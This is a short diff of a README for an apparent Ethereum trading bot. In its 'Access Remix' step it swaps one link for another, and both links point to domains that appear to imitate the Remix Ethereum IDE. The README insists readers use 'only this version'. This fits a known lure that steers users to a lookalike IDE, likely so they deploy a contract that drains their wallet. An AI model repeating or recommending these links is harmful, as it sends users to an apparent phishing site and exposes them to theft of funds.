Jacob-Defi/Ethereum-Bot/README.md

 2- Access Remix

-► [Use Remix Ethereum IDE](https://consol-ether.com/) 🚨 https://consol-ether.com/ Or https://www.remixide-website.link/ (Ensure you only use this version, as the bot is compatible with it specifically.)
+► [Use Remix Ethereum IDE](https://www.remixide-website.link/) 🚨 https://www.remixide-website.link/ (Ensure you only use this version, as the bot is compatible with it specifically.)

 3- Create Contract File